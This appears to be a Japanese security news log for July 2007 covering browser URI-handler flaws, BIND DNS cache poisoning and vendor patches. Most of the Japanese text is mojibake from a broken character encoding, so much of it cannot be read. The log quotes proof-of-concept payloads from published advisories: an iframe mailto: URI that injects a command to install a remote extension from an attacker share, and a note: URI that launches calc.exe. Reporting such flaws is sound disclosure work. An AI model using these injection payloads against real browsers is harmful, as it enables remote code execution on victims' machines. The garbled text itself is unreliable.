$B%;%-%e%j%F%#%[!<%k(B memo - 2007.07

Last modified: Sun Dec 2 23:48:48 2007 +0900 (JST)

$B!!$3$N%Z!<%8$N>pJs$rMxMQ$5$l$kA0$K!"(B$BCm0U=q$-(B$B$r$*FI$_$/$@$5$$!#(B

$B"#(B 2007.07.31

$B"#(B Firefox 2.0.0.6 $B%j%j!<%9%N!<%H(B
(mozilla-japan.org, 2007.07.31)

$B!!(BFirefox 2.0.0.6 $BEP>l!#(B2 $B7o$N7g4Y$,=$@5$5$l$F$$$k!#:4F#$5$s>pJs$"$j$,$H$&$4$6$$$^$9!#(B

$B"#(B $B%5%$%\%&%:(B Office 6 $B$K(B 3 $B$D$N
($B%5%$%\%&%:(B, 2007.07.27)

$B!!%5%$%\%&%:(B Office 6 $B$K(B 3 $B$D$NpJs$"$j$,$H$&$4$6$$$^$9!#(B

$B!!%5%$%\%&%:(B Office 6.6 (1.4) $B$G=$@5$5$l$F$$$k!#(B $B%5%$%\%&%:(B Office 6.6 (1.4) $B$G$O(B Windows Vista $B>e$G$NIT6q9g$b=$@5$5$l$F$$$k$h$&$@!#(BWindows Vista $B$X$NBP1~$K$D$$$F(B ($B%5%$%\%&%:(B)

$B"#(B $B$$$m$$$m(B (2007.07.31)
(various)

$B"#(B 2007.07.30

$B"#(B tDiary$B$N@H
(tDiary, 2007.07.23)

$B!!(BtDiary 2.0.x / 2.1.x $B$K7g4Y!#(B

  1. makerss.rb $B%W%i%0%$%s$^$?$O(B whatsnew-list.rb $B%W%i%0%$%s$r;H$C$F(B RSS $B$r@8@.$7$F$*$j!"$+$D(B
  2. URL $B$K%I%a%$%sL>$G$O$J$/(B IP $B%"%I%l%9$rD>@\;XDj$7$?>l9g$G$b(B tDiary $B$K%"%/%;%9$G$-!"$+$D(B
  3. tdiary.conf $B$K$*$$$F(B base_url $B$r;XDj$7$F$$$J$$(B

$B>l9g$K!"Bh;0

$B!!>-Mh$N0BDjHG$G=$@5$5$l$kM=Dj!#(B tdiary.conf $B$K$*$$$F(B base_url $B$KF|5-$N(B URL $B$r;XDj$9$l$P2sHr$G$-$k!#(B

$B!!4XO"(B: RSS$B$GG$0U$N%I%a%$%s$KM6F3$5$l$F$7$^$&@H ($B?eL57n$P$1$i$N$($SF|5-(B, 2007.07.27)

$B"#(B Mozilla Protocol Abuse: Cross-application URL handler command injection, Firefox and Thunderbird Demo
(Larholm.com, 2007.07.25)

$B!!(BThunderbird 2.0.0.4 $B0JA0$H(B Firefox 2.0.0.5 $B0JA0$NAH$_$"$o$;!"$*$h$S(B Mozilla / Netscape Navigator / Outlook / Outlook Express $B$K7g4Y!#(B $BFCDj$N(B URI $B%O%s%I%i$,@_Dj$5$l$F$$$k>l9g$K!"(B <iframe src='mailto://me@nowhere.com" -install-global-extension \\serverip\shared\cmd.xpi'></iframe> $B$N$h$&$J(B mailto: URI $B$r;H$C$F!"(Bremote $B$+$iG$0U$N%3%^%s%I$rCVE-2007-4038 (Thunderbird + Firefox) CVE-2007-4039 (Mozilla) CVE-2007-4040 (Outlook / Outlook Express)

$B!!(BThunderbird 2.0.0.5 + Firefox 2.0.0.5 $B$G$O$3$N7g4Y$OH/8=$7$J$$!#(B -osint $B%U%i%0$N$*$+$2$N$h$&$G$9!#(B

$B"#(B Remote Command Execution in FireFox et al
(Billy (BK) Rios, 2007.07.24)

$B!!(BFirefox 2.0.0.5 / 3.0a6 $B0JA0!"(BNetscape Navigator 9 $B$K7g4Y!#(B IE 7 $B$,%$%s%9%H!<%k$5$l$?4D6-$G!"(Bmailto / nntp / news / snews / telnet URI $B$K(B %00 (NULL) $B$r4^$`J8;zNs$r;XDj$9$k$H!"G$0U$N%m!<%+%k%W%m%0%i%`$r5/F0$G$-$F$7$^$&!#(B Remote Command Exec (FireFox 2.0.0.5 et al) $B$K%G%b%3!<%I$,7G:\$5$l$F$$$k!#(B IE 6 $B$,%$%s%9%H!<%k$5$l$?4D6-$G$O!"$3$N7g4Y$OH/8=$7$J$$!#(B CVE-2007-4041 (Firefox)$B!"(B VU#783400$B!"(B CVE-2007-4042 (Netscape)$B!#(B

$B!!(BBug 389580 - some schemes with %00 launch unexpected handlers on windows (mozilla.org) $B$d(B SA26201: Microsoft Windows URI Handling Command Execution Vulnerability (secunia) $B$K$h$k$H!"$3$N7g4Y$OI,$:$7$b(B %00 $B$GH/8=$9$k$o$1$G$O$J$$$h$&$@!#(B CreateUri Function (MSDN) $B$K@55,2=

$B!!(BFirefox 2.0.0.6 $B$G=$@5$5$l$kM=Dj!#(B

2007.07.31 $BDI5-(B:

$B!!(BFirefox 2.0.0.6 $B$G$O$^$@=$@5$5$l$F$$$J$$!#(B

$B"#(B 2007.07.27

$B"#(B 2007.07.26

$B"#(B 2007.07.25

$B"#(B Firefox 2.0.0.5$B$K%Q%9%o!<%I$,Ep$^$l$k@H
(Open Tech Press, 2007.07.25)

$B!!(B Holes in Firefox password manager [Update] (heise security, 2007.07.20) ($B%G%b%5%$%H(B) $B$NOC!#(B CIS Finds Flaws in Firefox v2 Password Manager $B$KN`;w$7$?!"$?$@$7(B JavaScript $B$rI,MW$H$9$k7g4Y$,$"$kLOMM!#(BSafari $B$bF1MM$i$7$$!#(B

$B"#(B $B$$$m$$$m(B (2007.07.25)
(various)

$B"#(B $B%"%s%A%&%$%k%9@=IJJ}LL$$$m$$$m(B
(various)

Panda
Kaspersky
Norman

$B!!%9%-%c%s%(%s%8%s(B 5.91.02 $B0J9_$G$OD>$C$F$$$k$h$&$G$9!#(B

CA

$B"#(B BIND 9 DNS Cache Poisoning
(trusteer.com, 2007.07.15)

$B!!(BBIND 9.x $B$r(B DNS cache $B%5!<%P$H$7$F1?MQ$7$?>l9g$K7g4Y!#(B transaction ID $B$N@8@.$KMQ$$$k5<;wMp?t@8@.4o(B (PRNG) $B$K7g4Y$,$"$j!"$3$l$rMxMQ$5$l$k$H(B DNS cache $B1x@w$r>7$/!#(B CVE-2007-2926

$B!!(BBIND 9.2.8-P1, BIND 9.3.4-P1, BIND 9.4.1-P1 $B$G=$@5$5$l$F$$$k!#(B

2007.08.20 $BDI5-(B:

$B!!(B[EXPL] DNS Cache Poison (BIND 9) (SecuriTeam, 2007.08.07)

2007.08.29 $BDI5-(B:

$B!!(Bbind 8 $B$K$bF1MM$N7g4Y$,$"$j!"(BBIND 8.4.7-p1 $B$,=P$F$$$k!#(B

$B!!$?$@$7!"(Bbind 8 $B$O$b$O$d(B$B%a%s%F%J%s%9$,=*N;$7$F$$$k(B$B$?$a!"(Bbind 9 $B$N:G?7HG$X0\9T$9$k$3$H$,K>$^$7$$!#(B

$B"#(B $BDI5-(B

Flash Player update available to address security vulnerabilities

$B!!(B$BK:$l$i$l$?(BWii$BBP1~!)!!(BFlash$B%Q%C%A$N%P!<%8%g%sHV9f$K:.Mp(B (ITmedia, 2007.07.24) $B$h$j(B:

Kaspersky$B$K$h$k$H!"(BWii$B$N(BFlash Player 7.0.70.0$B$O!"$[$+$N%W%i%C%H%U%)!<%`MQ$N(B7.0.70.0$B$h$j$bA0$NF|IU$K$J$C$F$*$j!"F1$8$b$N$G$J$$$3$H$OL@$i$+$@$H$$$&!#(BAdobe$B$N%5%$%H$K(BWii$B$K$D$$$F$N5-:\$O$J$/!"(BWii$B$N$3$H$OK:$l$i$l$F$$$k$h$&$@$H$$$&!#(B

$B!!%P!<%8%g%sHV9f$,F1$8$G$bF|IU$,0c$&$N$O$h$/$"$k$3$H$J$N$GJL$K$$$$$N$G$9$,!"Cf?H$^$G0c$C$F$$$k$H:$$k$N$G$9$h$M!D!D!#(B

$B"#(B 2007.07.24

$B"#(B $BDI5-(B

Flash Player update available to address security vulnerabilities

$B!!(BFlash$B$N@HuBV$K(B (ITmedia, 2007.07.23)$B!"(BWii gets Flashed by a bug too! (symantec blog, 2007.07.20)$B!#$"$l$'(B? $B%P!<%8%g%sHV9f$+$i$9$k$H!"7g4Y$N1F6A$r

$B%b!<%K%s%0%9%?!<

$B!!(B$B%b!<%K%s%0%9%?!<$B$,!V%b!<%K%s%0%9%?!<%&%(%V%5%$%H$N$4MxMQ$N3'$5$^$X$N$*4j$$!W$K$J$C$F$$$^$9!#(BLast Modified: $B$O(B Mon, 23 Jul 2007 13:46:56 GMT $B$G$9!#:rLk$h$&$d$/$G$9$+!D!D!#(Bgoogle $B$N!V$3$N%5%$%H$O%3%s%T%e!<%?$KB;32$rM?$($k2DG=@-$,$"$j$^$9!W(B $BI=<($O7QB3Cf$G$9!#(B

$B!!4XO"(B:

$B"#(B 2007.07.23

$B"#(B $B%b!<%K%s%0%9%?!<
([memo:9295], 2007.07.23)

$B!!!VEj;q?.Bw$rCf?4$H$7$?6bM;>&IJA4HL$rBh;0l$+$i3JIU$9$k>pJs@lLg%5%$%H!W(B $B%b!<%K%s%0%9%?!< $B$,!"(B1 $B=54V$[$IA0$+$i(B ($B$$$m$$$m$J(B?) $B%&%$%k%9$,$D$$$?$jGm$,$5$l$?$j$7$F$$$k$h$&$G$9!#(B

$B!!(B$B%b!<%K%s%0%9%?!<$B$K$b$"$k$h$&$K!"$0$0$k$H!"(B$B$3$N%5%$%H$O%3%s%T%e!<%?$KB;32$rM?$($k2DG=@-$,$"$j$^$9(B$B$H8@$o$l$F$7$^$$$^$9(B [$B2hA|(B]$B!#(B $B%j%s%/$r$?$I$k$H$3$s$J46$8(B [$B2hA|(B]

$B!!!D!D(B @IT $B$+$i4XO"5-;v=P$F$^$9(B: $B!V$3$N%5%$%H$O%3%s%T%e!<%?$KB;32$rM?$($k2DG=@-!W!!(B $B9qFb%5%$%H$K$b7Y9p!=!=%0!<%0%k$N%^%k%&%'%"7Y9p5!G=$KB8:_46(B (@IT, 2007.07.23)$B!#%b!<%K%s%0%9%?!<$H%(%-%5%$%H7HBS%[!<%`%Z!<%8(B ($BKbK!$N(Bi$B$i$s$I(B) $B$rNc$K2r@b$7$F$$$^$9!#(B

$B%b!<%K%s%0%9%?!<$N%W%m%@%/%H%5!<%S%9It$K$h$k$H!"F1uBV!W!JF1It!K$H$J$C$?!#30It$+$i;XE&$rfIW!W$H$$$&!#(B

$B!!$$$D$+$i!VBg>fIW!W$J$N$+ITL@$G$9$M!#(B

$B$?$@!"!V$I$&$$$C$?7A$G%&%$%k%9$K46@w$7$?$N$+$O$^$@FCDj$G$-$F$$$J$$!W$H$b$$$$!"%;%-%e%j%F%#%Y%s%@$KD4::$H:,K\E*$JBP:v$r0MMj$7$F$$$k!#(B

$B!!K\Ev$K!V$$$^$O%"%/%;%9$7$F$bBg>fIW!W$J$N$G$7$g$&$+!D!D!#(B

2007.07.24 $BDI5-(B:

$B!!(B$B%b!<%K%s%0%9%?!<$B$,!V%b!<%K%s%0%9%?!<%&%(%V%5%$%H$N$4MxMQ$N3'$5$^$X$N$*4j$$!W$K$J$C$F$$$^$9!#(BLast Modified: $B$O(B Mon, 23 Jul 2007 13:46:56 GMT $B$G$9!#:rLk$h$&$d$/$G$9$+!D!D!#(Bgoogle $B$N!V$3$N%5%$%H$O%3%s%T%e!<%?$KB;32$rM?$($k2DG=@-$,$"$j$^$9!W(B $BI=<($O7QB3Cf$G$9!#(B

$B!!4XO"(B:

$B"#(B 2007.07.20

$B"#(B MacBook$B$NH/2P;v8N(B
(slashdot.jp, 2007.07.20)

$B!!!V8=9T$N(B1$B$DA0$N(BMacBook(CoreDuo 2GHz)$B$,:#7n(B13$BF|$KH/2P$7$?!W$N$@$=$&$@!#(B $B!V%"%C%W%k$5$^$N4uK>$K$h$j5-;v$r:o=|!W$H$$$&$N$,!"$$$+$K$b%"%C%W%k$G$9$J!#=-$$$b$N$K$O38$G(B GO!

  • MacBook$B=P2P!"(B13$BF|(B($B6b(B)$B$N$3$H(B ($B$O$F$JF?L>%@%$%"%j!<(B, 2007.07.18)

  • $B%"%C%W%k$N(BMacBook$B$,GzH/1j>e(B (gigazine, 2007.03.13)$B!#:#2s$N7o$HF1N`(B?

  • MacBook $B$*$h$S(B MacBook Pro $B$N%P%C%F%j!<%"%C%W%G!<%H(B (Apple)

    $BCm0U!'%Q%U%)!<%^%s%9$NLdBj$r0z$-5/$3$7$F$$$k860x$K0BA4LL$G$N%j%9%/$O$"$j$^$;$s!#8=:_$N%P%C%F%j!<$r$=$N$^$^$*;H$$$$$?$@$1$^$9!#(B
    $B$3$N%P%C%F%j!<%"%C%W%G!<%H$O!"$9$Y$F$N(B MacBook$B!"(BMacBook Pro$B!"$*$h$S(B 2006 $BG/(B 2 $B7n$+$i(B 2007 $BG/(B 4 $B7n$N4V$K9XF~$5$l$?M=Hw$N%P%C%F%j!<$G$4MxMQ$$$?$@$1$^$9!#(B
    ($BCfN,(B)
    Intel Core Duo $B%W%m%;%C%5Ek:\$N(B MacBook $B$*$h$S(B MacBook Pro $B$K4X$7$F$O!"$3$N%W%m%0%i%`$O%P%C%F%j!<$N=$M}J]>Z$,@=IJ$N9XF~F|$+$i:GD9(B 2 $BG/4V$^$G1dD9$5$l$^$9!#(B

    $B$3$l$H$OJL$NOC$J$N$+$b$7$l$^$;$s$,!"8=uBV$G!V0BA4LL$G$N%j%9%/$O$"$j$^$;$s!W$H8@$o$l$F$b$M$(!D!D(B

$B!!(BCoreDuo $B$NE[$,FC$K$@$a$@$a$J$N$+$J$!!D!D(B?

$B"#(B $B!J?7$?$J$*4j$$!K%N!<%H#P#CMQ%P%C%F%j%Q%C%/$N;v8N$KH<$&<+
($BEl

$B!!El$B:rG/$+$iOCBj$K$J$C$F$$$kOC(B$B$H$OJL$NOC$J$N$GCm0U!#(B $B!VEv3:%m%C%H$N%P%C%F%j$r;HMQ$7$?%P%C%F%j%Q%C%/$NL5=~8r49%W%m%0%i%`!W$r

$B"#(B $BDI5-(B

Changelog for Opera 9.22 for Windows

$B!!4XO"(B: [Full-disclosure] iDefense Security Advisory 07.19.07: Opera Software Opera Web Browser BitTorrent Dangling Pointer Vulnerability$B!#(B

IE$B$H(BFirefox$B$r%$%s%9%H!<%k$7$F$$$k?M$OMWCm0U(B--$B!VHs>o$K=EBg!W$J%;%-%e%j%F%#%j%9%/(B

$B!!$3$N7g4Y$G$9$,!"(BFirefox $B$@$1$G$J$/(B Thunderbird $B$K$b1F6A$9$k$=$&$G$9!#(B

$B!!(BThunderbird 2.0.0.5 $B$G=$@5$5$l$k$=$&$G$9$,!"(BThunderbird 2.0.0.5 $B$O$^$@8x3+$5$l$F$$$^$;$s!#!D!D$H$+8@$C$F$k4V$K=P$F$^$7$?!#(B

$B!!(BiDefense $B$+$i$b=P$F$^$7$?(B: [Full-disclosure] iDefense Security Advisory 07.19.07: Multiple Vendor Multiple Product URI Handler Input Validation Vulnerability$B!#(B Microsoft $BE*$K$O!"(BRegistering an Application to a URL Protocol (MSDN) $B$G$b9-Js$7$F$$$?;EMM$@$C$?$h$&$G!#(BMSDN $B$KNc<($5$l$F$$$?(B note: URI $B%O%s%I%i$,l9g!"(B

<iframe src='note:"|calc.exe '>

$B$H$$$&%?%0$G(B calc.exe $B$,<+F0$G5/F0$5$l$?$h$&$G$9!#(BMSDN $B%Z!<%8!"8=:_$O2~D{$5$l$F$$$^$9!#(B

$B!!(BiDefense $B$K$h$k$H!">/$J$/$H$b 

HKEY_CLASSES_ROOT\FirefoxURL\shell
HKEY_CLASSES_ROOT\Thunderbird.Url.mailto\shell
HKEY_CLASSES_ROOT\Thunderbird.Url.news\shell
HKEY_CLASSES_ROOT\mailto\shell
HKEY_CLASSES_ROOT\news\shell

$B"#(B $B$$$m$$$m(B (2007.07.20)
(various)

$B"#(B 2007.07.19

$B"#(B Changelog for Opera 9.22 for Windows
(Opera, 2007.07.19)

$B!!(BOpera 9.22 $BEP>l!#(B data: URL $B$N7o(B (CVE-2007-3819) $B$r4^$a!"(B $BJ#?t$N%;%-%e%j%F%#=$@5$,$"$kLOMM!#(B

2007.07.20 $BDI5-(B:

$B!!4XO"(B: [Full-disclosure] iDefense Security Advisory 07.19.07: Opera Software Opera Web Browser BitTorrent Dangling Pointer Vulnerability$B!#(BCVE-2007-3929

$B"#(B $BDI5-(B

Firefox 2.0.0.5 Release Notes

$B!!F|K\8l$J0FFb$b=P$^$7$?(B:

$B!!FbLu(B:

Critical:
High:
Moderate:
Low:

$B"#(B Oh Look. An Apple WORM?
(McAfee blog, 2007.07.18)

$B!!(BMac OS X 10.4.x $B$N(B MDNSResponder $B$K4X$9$k(B 0-day $B$J7g4Y$rMxMQ$7$?%o!<%`$N(B PoC $B%3!<%I$,24924 - Apple Mac OS X mDNSResponder Variant Unspecified Remote Code Execution Vulnerability (securityfocus)

$B"#(B Google$B$K7c$7$/7y$o$l$?$i$7$$(B - $B8!:w7k2L=g0L$,6KC<$K2<$,$C$?(B
(Semplice, 2007.07.19)

$B!!8!:w=g0L$,2<$,$k$@$1$J$i$^$@M}2r$G$-$k$1$I!"$J$<$o$6$o$6$3$NJ8>O$,I=<($5$l$k$N$+$H$$$&$N$,$h$/$o$+$i$J$$$J!D!D!#$$$C$?$$$I$&$$$&!V<+F0=hM}!W$J$s$@$m$&!#(B

Semplice
$B!JD>@\$N4X$o$j$OL5$$$,!"(BGoogle$B$O!V(BStop Badware Coalition$B!W$J$kCDBN$K;22C$7$F$$$J$,$i!"B?$/$N0-5=%=%U%H%&%'%"$r%9%]%s%5!<%I9-9p$H$7$FI=<($7$F$$$?2a5n$,$"$k!J(BGoogle$B$N9-9p$K@x$`!"%^%k%&%'%"G[I[Semplice$B!K(B ...
blog.lucanian.net/ - 71k - $B%-%c%C%7%e(B - $B4XO"%Z!<%8(B

$B!!(BYahoo! Japan $B$@$H(B 3 $B0L$G$3$N$h$&$KI=<($5$l$^$9$M!#(B

Semplice
$B%^%k%&%'%"$N2r@b!"BP:v!"4XO"%K%e!<%9$N9M;!!#(B ... Semplice$B$N%H%C%W$X(B > $B;(J8(B $B%+%F%4%j(B >$B$3$N5-;v$X$N8GDj%j%s%/(B ... $B5-;v$NE>:\$d0zMQ$K:]$7$F$O!"(BSemplice$B$h$j$NE>:\$H0zMQ$=$7$F%j%s%/$K$D$$$F$N$*4j$$$r$^$:$O1\Mw2<$5$$!#(B ...blog.lucanian.net -$B%V%C%/%^!<%/!'(B12$B?M$,EPO?(B-$B%-%c%C%7%e(B

$B"#(B 2007.07.18

$B"#(B $B$$$m$$$m(B
(various)

$B"#(B $B%H%l%s%I%^%$%/%m(B CSM / OfficeScan $BJ}LL(B
(iDefense, 2007.07.16)

$B!!%H%l%s%I%^%$%/%m$N(B Client Server Messaging Security for Small and Medium Business 3.0 / 3.5 / 3.6$B!"(BOfficeScan Corporate Edition 6.5 / 7.0 / 7.3 / 8.0$B!"(BOfficeScan 6.0 in Client/Server/Messaging Suite for SMB 2.0 $B$N(B CGI $B%b%8%e!<%k$K(B 2 $B$D$N7g4Y!#(B

$B!!(Bpatch $B$,=P$F$$$k$N$GE,MQ$9$l$P$h$$!#(B

$B!!(BClient Server Messaging Security for Small and Medium Business $B$OF|K\$G8@$&$H$3$m$N(B $B%&%$%k%9%P%9%?!<(B $B%S%8%M%9%;%-%e%j%F%#(B$B!"(B OfficeScan $B$O(B $B%&%$%k%9%P%9%?!<(B $B%3!<%]%l!<%H%(%G%#%7%g%s(B $B$G$$$$$s$G$9$+$M!#%@%&%s%m!<%I%Z!<%8(B:

$B!!:#2s$N%b%N$NF|K\8lHG$O$^$@$"$j$^$;$s!#(B

$B!!(BUS $B$G$O(B 2006.10.19 $B$KEP>l$7$F$$$k(B Client/Server/Messaging Security 3.0 Patch 1 for SP1 $B$O!"F|K\$G$O(B 2007.04.18 $B$G$9$M(B ($B%&%$%k%9%P%9%?!<%S%8%M%9%;%-%e%j%F%#(B 3.0 $BMQ(B Service Pack 1 Patch 1)$B!#%H%l%s%I%^%$%/%m$N%j%j!<%9%(%s%8%K%"%j%s%0$C$F$I$&$J$C$F$k$N(B? $B$J$s$@$+(B 1990 $BG/Be$N%^%$%/%m%=%U%H$rO"A[$7$F$7$^$&$N$G$9$1$I!#(B

2007.08.02 $BDI5-(B:

$B!!F|K\8lHG(B patch $B=P$^$7$?!#(B

$B!!%&%$%k%9%P%9%?!<(B $B%3!<%]%l!<%H%(%G%#%7%g%s(B 8.0 $BMQ$N(B patch $B$G$9$,!"1Q8lHG$O(B build 1042 $B$J$N$KF|K\8lHG$O(B build 1043 $B$G$9$M!#(B

$B"#(B Oracle Critical Patch Update - July 2007
(Oracle, 2007.07.17)

$B!!(BOracle patch 2007.07 $BHG=P$^$7$?!#(B

$B"#(B $B$=$m$=$m(B UTF-7 $B$K$D$$$F0l8@$$$C$H$/$+(B
($BMU$C$QF|5-(B, 2007.07.17)

$B!!(BWeb $B%"%W%j$N=PNO$K$*$$$F!"(BIE $B$,@5$7$/H=JL$G$-$J$$(B charset $B$,;XDj$5$l$F$$$k$H!"(BIE $B$O$=$l$r(B UTF-7 $B$H8mG'$9$k>l9g$,$"$j!"$=$N>l9g$K(B XSS $B7g4Y$,H/8=$9$kOC!#(B IE $B$,@5$7$/H=JL$G$-$k(B charset $B$O(B HKCR\MIME\Database\charset $B$KNs5s$5$l$F$$$k$=$&$@!#(B

$B"#(B $BDI5-(B

McAfee$B$N%(%s%?!<%W%i%$%:8~$1%=%U%H$K@H

$B!!(BFree ePO Vulnerability Scanner (eEye Research, 2007.07.17)

IE$B$H(BFirefox$B$r%$%s%9%H!<%k$7$F$$$k?M$OMWCm0U(B--$B!VHs>o$K=EBg!W$J%;%-%e%j%F%#%j%9%/(B

$B!!(BFirefox 2.0.0.5 $B$,EP>l(B$B$7$^$7$?!#(B $B%O%s%I%i$G$9$,!" 

[HKEY_CLASSES_ROOT\FirefoxURL\shell\open\command\@]
C:\\PROGRA~1\\MOZILL~2\\FIREFOX.EXE -requestPending -osint -url "%1"

$B!!$"$H!"(BIE + Firefox2 $B$N@H ($B?eL57n$P$1$i$N$($SF|5-(B, 2007.07.16) $B$K(B FirefoxHTML $B$K$O:a$O$J$$$H$$$&OC$,=P$F$$$^$7$?!#(B

$B"#(B Firefox 2.0.0.5 Release Notes
(mozilla.com, 2007.07.14)

$B!!(BFirefox 2.0.0.5 $BEP>l!#(BIE$B$H(BFirefox$B$r%$%s%9%H!<%k$7$F$$$k?M$OMWCm0U(B--$B!VHs>o$K=EBg!W$J%;%-%e%j%F%#%j%9%/(B$B$NOC$N%;%-%e%j%F%#=$@5$J$I$,4^$^$l$F$$$k$O$:$@$,!"(BFixed in Firefox 2.0.0.5 $B$O$^$@B8:_$7$J$$!#!D!D$"!"$G$-$?$_$?$$!#9g7W(B 8 $B

$B!!(BIE$B$H(BFirefox$B$r%$%s%9%H!<%k$7$F$$$k?M$OMWCm0U(B--$B!VHs>o$K=EBg!W$J%;%-%e%j%F%#%j%9%/(B$B$X$NBP1~$H$7$F(B URL $B%O%s%I%i$r:o=|$7$?>l9g$G$b!"(B2.0.0.5 $B$K%"%C%W%G!<%H$9$k$H:F:n@.$5$l$^$7$?!#(B

2007.07.19 $BDI5-(B:

$B!!F|K\8l$J0FFb$b=P$^$7$?(B:

$B!!FbLu(B:

Critical:
High:
Moderate:
Low:

$B"#(B 2007.07.17

$B"#(B FreeBSD-SA-07:05.libarchive - Errors handling corrupt tar files in libarchive(3)
(FreeBSD, 2007.07.12)

$B!!(BFreeBSD 5.3 $B0J9_$N(B libarchive(3) $B$K7g4Y!#(B tar / pax $B%U%!%$%k$N=hM}$K7g4Y$,$"$j!"(Bbuffer overflow $B$,H/@8$7$FG$0U$N%3!<%I$rCVE-2007-3641) $BB>!"L58B%k!<%W(B (CVE-2007-3644) $B$d%/%i%C%7%e(B (CVE-2007-3645) $B$,H/@8$9$k!#(B tar $B$rMxMQ$7$?>l9g$K7g4Y$,H/8=$9$k!#(B

$B!!(B5-STABLE / RELENG_5_5, 6-STABLE / RELENG_6_1 / RELENG_6_2 $B$N:G?7%=!<%9$G=$@5$5$l$F$$$k!#DL>o$O(B libarchive $B$H(B rescue $B$r$D$/$j$J$*$;$P$h$$$N$@$,!"(Bamd64 $B%W%i%C%H%[!<%`$K$*$$$F(B i386 $B8_49%i%$%V%i%j$rMxMQ$7$F$$$k>l9g$K$O(B make world $B$,I,MW$K$J$k!#(B

$B"#(B $BDI5-(B

Flash Player update available to address security vulnerabilities

$B!!4XO"(B:

$B"#(B 2007.07.16

  • $B!U(B NOD32$B%"%s%A%&%$%k%9$,@5>o$KF0:n$7$J$$8=>]$K4X$9$k=EMW$J$*CN$i$;(B (canon-sol.jp, 7/10)$B!#:#$O$@$$$8$g$&$V$@$=$&$G!#(B

  • $B!U(B $B#a#uMxMQNA!"#5K|$r#5#0#0K|$H8m@A5a!D%7%9%F%`IT6q9g$G(B ($BFIGd(B, 7/15)$B!#9k2w$G$9$M!#(B

  • $B!U(B $B3K;\@_$N2TF/Dd;_!&#I#A#E#A$N4F;kMFG'!DKLD+A/$,I=L@(B ($BFIGd(B, 7/15)

  • $B!U(B $BCf9q;:%&%J%.!'9g@.936]:^$r8!=P!!72GO!&A066(B ($BKhF|(B, 7/14)$B!#FAEg5{;T>l$G$9$+!#(B

  • $B!U(B $B%S%s%i%G%#%sMF5?l(B (asahi.com, 7/15)

  • $B!U(B $BElFn%"%8%"3$B1>pJs(B (6/7$B!A(B7/11 $BF~ ($B3$>eJ]0BD#(B, 7/12)

  • $B!U(B $B;21!A*!'<+L18uJd#3#2!s!"3KIpAu8!F$$rMFG'!!KhF|?7J9D4::(B ($BKhF|(B, 7/16)$B!#D6%S%s%\!<$J6b$A$c$s$A$@$C$F;}$C$F$k$N$K!"$I$&$7$F%\%/$s$A$O;}$C$F$J$$$N%)!

    • $B"#(B 2007.07.15

    $B"#(B $BDI5-(B

    JVN#44724673: Java Web Start $B$K$*$$$F5v2D$5$l$F$$$J$$%7%9%F%`%/%i%9$,

    $B!!(BJDK / JRE 5 Update 6 $B0J9_$d(B JDK / JRE 6 $B$G$O!"8E$$%P!<%8%g%s$N(B JRE $B$r;X<($5$l$?>l9g$N07$$$,2~A1$5$l$F$*$j!":G?7HG$r%$%s%9%H!<%k$5$($9$l$P$h$$$h$&$@!#(B $BB3!&8|@8O+F/>J$N@H ($B9bLZ9@8w!w<+Bp$NF|5-(B, 7/10) $B$N!V(BJava Update$B$7$F$b8E$$(BJRE$B$,>C$($J$$LdBj!W$r;2>H!#(B

    $B!!%;%-%e%j%F%#%Y!<%9%i%$%s$K$I$N$h$&$J%P!<%8%g%s$,;XDj$5$l$F$$$k$N$+$O!"(BJava SE $B$N%j%j!<%9%N!<%H$KL@5-$5$l$F$$$k!#$?$H$($P(B Java SE 6 Update Release Notes (Sun) $B$N!V(B1.6.0_02 $B$G$NJQ99E@(B$B!W$r8+$k$H!"(B $B$3$s$JI=$,$"$k!#(B

    JRE Family Version Security Baseline
    5.0 1.5.0_12
    1.4.2 1.4.2_14
    102934: Security Vulnerabilities in the Java Runtime Environment Image Parsing Code may Allow a Untrusted Applet to Elevate Privileges

    $B!!85$M$?$H(B CVE $B$,8x3+$5$l$F$$$k!#(B

    2007 $BG/(B 7 $B7n$N%;%-%e%j%F%#>pJs(B

    $B!!>e5-$7$?(B 7$B7n$N%;%-%e%j%F%#(B $B%j%j!<%9(B $B8e$N$^$H$a(B ($BF|K\$N%;%-%e%j%F%#%A!<%`$N(B Blog, 2007.07.13) $B$K$*$$$F(B 940297 - Windows XP SP2 $B$K(B .Net Framework $B$r:F%$%s%9%H!<%k$9$kJ}K!(B $B$,>R2p$5$l$F$$$?$N$GDI5-!#(B

    $B"#(B 2007.07.13

    $B"#(B High Risk Vulnerability in AVG Antivirus
    (NGSSoftware, 2007.07.13)

    $B!!(BAVG AntiVirus $B$K7g4Y!#%+!<%M%k%b!<%I%5!<%S%9%I%i%$%P(B avg7core.sys $B$K7g4Y$,$"$j!"(Blocal user $B$,G$0U$N%"%I%l%9$KG$0U$N%G!<%?$r=q$-9~$a$k!#(B CVE-2007-3777

    $B!!(BAVG 7.5 build 476 (avg7core.sys 7.5.0.476) $B$G=$@5$5$l$F$$$k!#(B $B%@%&%s%m!<%I(B: AVG Anti-Virus Professional Edition 7.5 (full version)$B!"(B AVG Anti-Virus Free Edition 7.5

    $B"#(B QuarkXPress Word File Import Filter Buffer Overflow Vulnerability
    (vuln.sg, 2007.07.11)

    $B!!(BQuarkXPress 7.2 for Window $B$K7g4Y!#(BWord 6-2000 Filter.xnt $B$K(B stack overflow $B$9$k7g4Y$,$"$j!"96N,(B Word $B%U%!%$%k$K$h$C$FG$0U$N%3!<%I$rCVE-2007-3678

    $B!!(Bpatch $B$O$^$@$J$$!#(B

    $B"#(B Secretly Monopolizing the CPU Without Superuser Privileges
    (Dan Tsafrir, 2007.04.14)

    $B!!(Bkernel $B%9%1%8%e!<%iJ}LL$NOC$_$?$$!#(BUSENIXSecrity '07 $B$GH/I=$5$l$?$N$@$=$&$G!#(B $B$h$/$o$+$s$J$$$1$I!"(Blocal user $B$,(B DoS $B967b$G$-$k$_$?$$!#(B CVE-2007-3724 (XP) CVE-2007-3723 (Solaris) CVE-2007-3722 (FreeBSD 4BSD) CVE-2007-3721 (FreeBSD ULE) CVE-2007-3720 (Linux 2.4) CVE-2007-3719 (Linux 2.6.16)

    $B"#(B $B$$$m$$$m(B (2007.07.13)
    (various)

    $B"#(B $BDI5-(B

    McAfee$B$N%(%s%?!<%W%i%$%:8~$1%=%U%H$K@H

    $B!!F|K\8lHG(B:

    2007 $BG/(B 7 $B7n$N%;%-%e%j%F%#>pJs(B

    $B!!4XO"(B:

    IE$B$H(BFirefox$B$r%$%s%9%H!<%k$7$F$$$k?M$OMWCm0U(B--$B!VHs>o$K=EBg!W$J%;%-%e%j%F%#%j%9%/(B

